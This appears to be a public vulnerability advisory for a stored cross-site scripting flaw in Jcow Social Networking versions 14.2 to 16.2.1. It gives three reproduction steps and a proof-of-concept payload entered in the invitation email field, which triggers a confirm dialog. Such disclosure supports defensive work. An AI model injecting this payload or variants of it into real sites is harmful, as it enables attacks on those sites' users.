Jcow Social Network Cross Site Scripting

2024.05.24

Credit: tmrswrr

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

# Exploit Title: Jcow Social Networking 14.2 < 16.2.1 | Stored XSS
# Date: 2024-05-23
# Author: tmrswrr
# Vendor Homepage: https://www.jcow.net/
# Software Link: https://sourceforge.net/projects/jcow/
# Tested : https://demo.jcow.net/
# Version : 14.2 < 16.2.1
1) Login with any user Click invite place : https://127.0.0.1/Jcow/index.php?p=invite
2) Write in To (Email address) field your payload : "><img src=x onerrora=confirm() onerror=confirm(1)>
3) After Send invitations you will be see alert button

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Jcow Social Network Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.